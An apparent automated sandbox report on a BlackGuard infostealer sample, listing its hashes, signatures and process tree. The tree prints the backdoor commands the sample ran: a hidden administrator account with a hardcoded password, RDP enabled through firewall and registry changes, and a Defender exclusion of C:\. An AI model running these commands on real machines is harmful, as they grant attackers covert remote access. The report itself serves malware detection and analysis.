Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2023 19:24

General

  • Target

    file.exe

  • Size

    6.9MB

  • MD5

    146ffe4774086772bb8dc8af417d1bee

  • SHA1

    a6ba1bfd326034d363f003def9600e4b3f8a3c99

  • SHA256

    feb090fe2a018ba71f2db302a253998b66f9655a0d83f80db512604093aee9de

  • SHA512

    332272905c5d85c226fcaa74ad60bf6bdd9544809b4dff4cedba42b42b8aa005c0cf7a9224a3c9070858a7311a640eedfeb1e5c19296b286e3ba5952584f99cb

  • SSDEEP

    98304:5iyaKXumYgc4UC0td7fAYMQSlV4AnEjdGS1YVrsk9N8ivyhAdsPSQxNU3r:o5KmgfUCEvyVN8iNISeU7

Malware Config

Extracted

Family

blackguard

C2

https://ipwhois.app/xml/

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Accesses Microsoft Outlook profiles
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • outlook_office_path
    • outlook_win_path
    PID:1360
    • C:\Users\Admin\AppData\Local\Temp\Inst.exe
      "C:\Users\Admin\AppData\Local\Temp\Inst.exe" x -pBlackTeam000111000111!
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Users\Admin\AppData\Local\Temp\check.exe
        "C:\Users\Admin\AppData\Local\Temp\check.exe" -i
        3⤵
        • Executes dropped EXE
        • Sets DLL path for service in the registry
        • Modifies WinLogon
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:316
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
          4⤵
          • Modifies Windows Firewall
          PID:1972
      • C:\Users\Admin\AppData\Local\Temp\check_update.exe
        "C:\Users\Admin\AppData\Local\Temp\check_update.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\Upgrade.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1096
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1132
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\system32\find.exe
              Find "="
              6⤵
                PID:2008
            • C:\Windows\system32\net.exe
              net user xblackArgus xtrinity3301 /add /active:"yes" /expires:"never" /passwordchg:"NO"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1328
            • C:\Windows\system32\net.exe
              net localgroup Administrators xblackArgus /add
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators xblackArgus /add
                6⤵
                  PID:108
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1184
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:996
                • C:\Windows\system32\find.exe
                  Find "="
                  6⤵
                    PID:1580
                • C:\Windows\system32\net.exe
                  net localgroup "Remote Desktop Users" xblackArgus /add
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1972
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup "Remote Desktop Users" xblackArgus /add
                    6⤵
                      PID:676
                  • C:\Windows\system32\net.exe
                    net accounts /forcelogoff:no /maxpwage:unlimited
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:764
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                      6⤵
                        PID:1712
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                      5⤵
                        PID:1544
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                        5⤵
                          PID:1416
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
                          5⤵
                            PID:656
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
                            5⤵
                              PID:1060
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
                              5⤵
                                PID:1340
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v xblackArgus /t REG_DWORD /d 0x0 /f
                                5⤵
                                  PID:852
                                • C:\Windows\system32\attrib.exe
                                  attrib C:\users\xblackArgus +r +a +s +h
                                  5⤵
                                  • Sets file to hidden
                                  • Views/modifies file attributes
                                  PID:240
                                • C:\Windows\system32\cacls.exe
                                  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                  5⤵
                                    PID:1308
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -command Add-MpPreference -ExclusionPath C:\
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1804
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 user xblackArgus xtrinity3301 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                            1⤵
                              PID:1280

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Temp\Inst.exe

                              Filesize

                              944KB

                              MD5

                              748db7ac9ccf4c4e42061a815c1f51bc

                              SHA1

                              bcec245408baf570812c6103867c808133f9a575

                              SHA256

                              c103498f73546b5f802a9bd42c7d97819034cc854d619298338d160c6273cce8

                              SHA512

                              1b051e5604482c04b073e933a36b6f8c41a50d15f079536959521fd3058e8d9ef1a5c613553509323dd65a2ce51bb72e639bf9beabd4cc0a1fa4fbfdeaf8ae2c

                            • C:\Users\Admin\AppData\Local\Temp\Inst.exe

                              Filesize

                              944KB

                              MD5

                              748db7ac9ccf4c4e42061a815c1f51bc

                              SHA1

                              bcec245408baf570812c6103867c808133f9a575

                              SHA256

                              c103498f73546b5f802a9bd42c7d97819034cc854d619298338d160c6273cce8

                              SHA512

                              1b051e5604482c04b073e933a36b6f8c41a50d15f079536959521fd3058e8d9ef1a5c613553509323dd65a2ce51bb72e639bf9beabd4cc0a1fa4fbfdeaf8ae2c

                            • C:\Users\Admin\AppData\Local\Temp\Upgrade.bat

                              Filesize

                              2KB

                              MD5

                              8281beda1f129589fd4e2e9b15885f4c

                              SHA1

                              570fa137599993baf6e733a48eec21048c3c3e10

                              SHA256

                              ac933c75e70d33b91e46f717d4437c8b1d4fd89990e2f6d271559756189741b7

                              SHA512

                              363b28aa98ccec158201004e6653167cfe1ea703e4132b12456e725f62dcf9ddc450f39da18428628c405738c396135287433b5590cf8ca18830f6510a4fe20c

                            • C:\Users\Admin\AppData\Local\Temp\check.exe

                              Filesize

                              1.4MB

                              MD5

                              3288c284561055044c489567fd630ac2

                              SHA1

                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                              SHA256

                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                              SHA512

                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                            • C:\Users\Admin\AppData\Local\Temp\check_update.exe

                              Filesize

                              13KB

                              MD5

                              d03fb817cf73c22ad37e47b1509ea519

                              SHA1

                              865d238b7815a06542909a2eb57575d6f8d4bffc

                              SHA256

                              efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4

                              SHA512

                              864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980

                            • C:\Users\Admin\AppData\Local\Temp\check_update.exe

                              Filesize

                              13KB

                              MD5

                              d03fb817cf73c22ad37e47b1509ea519

                              SHA1

                              865d238b7815a06542909a2eb57575d6f8d4bffc

                              SHA256

                              efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4

                              SHA512

                              864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980

                            • C:\Users\Admin\AppData\Local\Temp\rdpwrap.ini

                              Filesize

                              325KB

                              MD5

                              978614ba750e0bede19be09885076cb1

                              SHA1

                              8ac61f5a3c37adff67c6a71a3adea5f4ddba0e63

                              SHA256

                              39e76f6ab9fde606bbb277202e0af7cfe6e419a22936da7f3269969b8fb9dcd4

                              SHA512

                              846ac9df5838f85a9cdc36edffb599144dd84e3ce0996a1471ca9ae10c88bbfe9de02b7b42664eb2559f3a87cf3263c87e0a6050f08150346cc5294c65d527bf

                            • \Program Files\RDP Wrapper\rdpwrap.dll

                              Filesize

                              114KB

                              MD5

                              461ade40b800ae80a40985594e1ac236

                              SHA1

                              b3892eef846c044a2b0785d54a432b3e93a968c8

                              SHA256

                              798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                              SHA512

                              421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                            • \Users\Admin\AppData\Local\Temp\check.exe

                              Filesize

                              1.4MB

                              MD5

                              3288c284561055044c489567fd630ac2

                              SHA1

                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                              SHA256

                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                              SHA512

                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                            • \Users\Admin\AppData\Local\Temp\check.exe

                              Filesize

                              1.4MB

                              MD5

                              3288c284561055044c489567fd630ac2

                              SHA1

                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                              SHA256

                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                              SHA512

                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                            • \Users\Admin\AppData\Local\Temp\check.exe

                              Filesize

                              1.4MB

                              MD5

                              3288c284561055044c489567fd630ac2

                              SHA1

                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                              SHA256

                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                              SHA512

                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                            • \Users\Admin\AppData\Local\Temp\check.exe

                              Filesize

                              1.4MB

                              MD5

                              3288c284561055044c489567fd630ac2

                              SHA1

                              11ffeabbe42159e1365aa82463d8690c845ce7b7

                              SHA256

                              ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                              SHA512

                              c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                            • \Users\Admin\AppData\Local\Temp\check_update.exe

                              Filesize

                              13KB

                              MD5

                              d03fb817cf73c22ad37e47b1509ea519

                              SHA1

                              865d238b7815a06542909a2eb57575d6f8d4bffc

                              SHA256

                              efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4

                              SHA512

                              864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980

                            • \Users\Admin\AppData\Local\Temp\check_update.exe

                              Filesize

                              13KB

                              MD5

                              d03fb817cf73c22ad37e47b1509ea519

                              SHA1

                              865d238b7815a06542909a2eb57575d6f8d4bffc

                              SHA256

                              efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4

                              SHA512

                              864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980

                            • \Users\Admin\AppData\Local\Temp\check_update.exe

                              Filesize

                              13KB

                              MD5

                              d03fb817cf73c22ad37e47b1509ea519

                              SHA1

                              865d238b7815a06542909a2eb57575d6f8d4bffc

                              SHA256

                              efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4

                              SHA512

                              864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980

                            • \Users\Admin\AppData\Local\Temp\check_update.exe

                              Filesize

                              13KB

                              MD5

                              d03fb817cf73c22ad37e47b1509ea519

                              SHA1

                              865d238b7815a06542909a2eb57575d6f8d4bffc

                              SHA256

                              efbd601add0c1704600c59595ba5f04a94202106a568b75a52b86af1b65ecac4

                              SHA512

                              864d7762e55568bf4d846a1c4389406218d78cfb19ca9ed11f1330a4cbccd87eda3e7fa3bcdb754de50a5447e88f9eca36375b45a80cd9323369e023a2b74980

                            • \Users\Admin\AppData\Local\Temp\x64\SQLite.Interop.dll

                              Filesize

                              1.7MB

                              MD5

                              56a504a34d2cfbfc7eaa2b68e34af8ad

                              SHA1

                              426b48b0f3b691e3bb29f465aed9b936f29fc8cc

                              SHA256

                              9309fb2a3f326d0f2cc3f2ab837cfd02e4f8cb6b923b3b2be265591fd38f4961

                              SHA512

                              170c3645083d869e2368ee16325d7edaeba2d8f1d3d4a6a1054cfdd8616e03073772eeae30c8f79a93173825f83891e7b0e4fd89ef416808359f715a641747d7

                            • memory/1076-61-0x0000000074F01000-0x0000000074F03000-memory.dmp

                              Filesize

                              8KB

                            • memory/1360-57-0x000000001AB50000-0x000000001AB75000-memory.dmp

                              Filesize

                              148KB

                            • memory/1360-54-0x00000000009B0000-0x0000000001092000-memory.dmp

                              Filesize

                              6.9MB

                            • memory/1360-58-0x000000001B890000-0x000000001B90A000-memory.dmp

                              Filesize

                              488KB

                            • memory/1360-55-0x000000001B250000-0x000000001B2B2000-memory.dmp

                              Filesize

                              392KB

                            • memory/1688-80-0x0000000000EB0000-0x0000000000EBA000-memory.dmp

                              Filesize

                              40KB

                            • memory/1804-111-0x0000000002594000-0x0000000002597000-memory.dmp

                              Filesize

                              12KB

                            • memory/1804-109-0x000007FEE8460000-0x000007FEE8E83000-memory.dmp

                              Filesize

                              10.1MB

                            • memory/1804-110-0x000007FEE7900000-0x000007FEE845D000-memory.dmp

                              Filesize

                              11.4MB

                            • memory/1804-112-0x000000001B750000-0x000000001BA4F000-memory.dmp

                              Filesize

                              3.0MB

                            • memory/1804-113-0x000000000259B000-0x00000000025BA000-memory.dmp

                              Filesize

                              124KB

                            • memory/1804-114-0x0000000002594000-0x0000000002597000-memory.dmp

                              Filesize

                              12KB

                            • memory/1804-115-0x000000000259B000-0x00000000025BA000-memory.dmp

                              Filesize

                              124KB

                            • memory/1972-72-0x000007FEFB751000-0x000007FEFB753000-memory.dmp

                              Filesize

                              8KB